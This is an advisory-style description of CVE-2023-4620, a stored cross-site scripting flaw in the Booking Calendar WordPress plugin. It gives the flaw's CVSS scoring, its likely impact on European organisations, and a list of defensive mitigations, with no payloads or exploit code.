CVE-2023-4620 is a medium severity vulnerability affecting the Booking Calendar WordPress plugin versions prior to 9.7.3.1. This vulnerability is classified as a Stored Cross-Site Scripting (XSS) issue (CWE-79), where the plugin fails to properly sanitize and escape certain booking form data inputs. Specifically, unauthenticated users can inject malicious scripts into booking data fields, which are then stored and later rendered in the administrative interface. When administrators view the affected booking entries, the malicious scripts execute in their browsers, potentially allowing attackers to perform actions such as session hijacking, credential theft, or unauthorized actions within the admin context. The vulnerability does not require any authentication to exploit, but does require that an administrator views the injected content, thus involving user interaction. The CVSS v3.1 base score is 6.1 (medium), reflecting the network attack vector (AV:N), low attack complexity (AC:L), no privileges required (PR:N), but requiring user interaction (UI:R). The scope is changed (S:C), indicating that the vulnerability affects components beyond the initially vulnerable component, and impacts confidentiality and integrity to a limited degree (C:L/I:L), with no impact on availability (A:N). No known exploits in the wild have been reported to date. The plugin is widely used for booking and reservation management on WordPress sites, making it a relevant target for attackers aiming to compromise administrative accounts or inject malicious content into websites. The lack of patch links suggests that users should upgrade to version 9.7.3.1 or later once available or apply vendor-provided fixes promptly to mitigate the risk.

For European organizations using the Booking Calendar WordPress plugin, this vulnerability poses a risk primarily to website administrators who manage bookings. Successful exploitation could lead to unauthorized execution of scripts in the admin context, potentially resulting in credential theft, session hijacking, or unauthorized administrative actions. This could compromise the integrity of booking data and the confidentiality of administrative credentials. While the availability of services is not directly impacted, the breach of administrative controls could lead to further compromise of the website or underlying infrastructure. Organizations in sectors relying heavily on online booking systems—such as hospitality, travel, event management, and healthcare—may face reputational damage, regulatory scrutiny under GDPR for data breaches, and operational disruptions. Since the exploit requires user interaction (admin viewing the malicious input), the risk is mitigated somewhat by administrative awareness but remains significant given the low complexity and unauthenticated attack vector. The vulnerability could also be leveraged as a foothold for more advanced attacks, including lateral movement within the network or deployment of malware.

1. Immediate upgrade of the Booking Calendar plugin to version 9.7.3.1 or later once available, as this version addresses the sanitization and escaping issues. 2. Until patching is possible, implement Web Application Firewall (WAF) rules to detect and block suspicious input patterns typical of XSS payloads in booking form submissions. 3. Restrict administrative access to trusted IP addresses or via VPN to reduce exposure to malicious inputs. 4. Educate administrators to be cautious when reviewing booking entries, especially those from unknown or suspicious sources. 5. Regularly audit and sanitize existing booking data to remove any potentially malicious scripts. 6. Employ Content Security Policy (CSP) headers to limit the impact of any injected scripts by restricting script execution sources. 7. Monitor logs for unusual activity related to booking form submissions and admin panel access. 8. Consider disabling or limiting booking form fields that accept free-text input until the vulnerability is patched. These steps go beyond generic advice by focusing on interim protective controls and administrative best practices tailored to the Booking Calendar plugin context.